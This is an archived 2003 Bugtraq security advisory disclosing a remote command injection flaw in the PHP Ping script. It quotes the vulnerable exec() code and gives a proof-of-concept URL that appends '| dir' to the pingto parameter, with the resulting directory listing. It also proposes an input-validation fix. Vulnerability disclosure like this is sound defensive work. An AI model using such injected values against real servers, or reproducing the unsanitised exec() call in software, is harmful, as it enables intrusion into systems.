[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030306120358.6703.qmail@www.securityfocus.com>
Date: 6 Mar 2003 12:03:58 -0000
From: "Grégory" Le Bras <gregory.lebras@...urity-corp.org>
To: bugtraq@...urityfocus.com
Subject: [SCSA-009] Remote Command Execution Vulnerability in PHP Ping
________________________________________________________________________
Security Corporation Security Advisory [SCSA-009]
________________________________________________________________________
PROGRAM: PHP Ping
HOMEPAGE: http://www.phpapps.org/
VULNERABLE VERSIONS: v0.1 and prior
________________________________________________________________________
DESCRIPTION
________________________________________________________________________
PHP ping "will allow you, provided that your server turns under Windows,
to realize a "ping" on the host of your choice."
(direct quote from PHP Ping website)
DETAILS
________________________________________________________________________
A vulnerability have been found in PHP ping which allow attackers to
execute remote command.
This vulnerability would allow a remote attacker to compromise parts of
the operating system, possibly the complete operating system.
Vulnerable code :
<?
//*************************************
// FONCTION DU PING
//*************************************
function PHPing($cible,$pingFile){
exec("ping -a -n 1 $cible >$pingFile", $list);
$fd = fopen($pingFile, "r");
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
//-------------------------------------
?>
EXPLOIT
________________________________________________________________________
The vulnerability was discovered in the page for execute "ping",
at this adress :
http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir
This exploit simply show the contents of the current repertory.
c:\phpping
03/03/2003 23:01 <DIR> .
03/03/2003 23:01 <DIR> ..
03/03/2003 23:00 <DIR> img
30/04/2002 23:13 3217 index.php
30/04/2002 23:19 921 README
03/03/2003 23:03 0 resultat.ping
3 file(s) 4138 bytes
3 Dir(s) 11413962752 bytes free
SOLUTIONS
________________________________________________________________________
For example use this code :
<?
//*************************************
// FONCTION DU PING
//*************************************
function PHPing($cible,$pingFile){
# BugFix by Gregory LEBRAS www.security-corp.org
if( (!$cible) ||
(!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/i",$cible)) ){
echo("Error: Please specify a valid target host or IP.");
exit;
}
else
{
exec("ping -a -n 1 $cible >$pingFile", $list);
$fd = fopen($pingFile, "r");
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
}
//------------------------------------
VENDOR STATUS
________________________________________________________________________
The vendor has reportedly been notified.
LINKS
________________________________________________________________________
Version Française :
http://www.security-corp.org/advisories/SCSA-009-FR.txt
------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
------------------------------------------------------------
Powered by blists - more mailing lists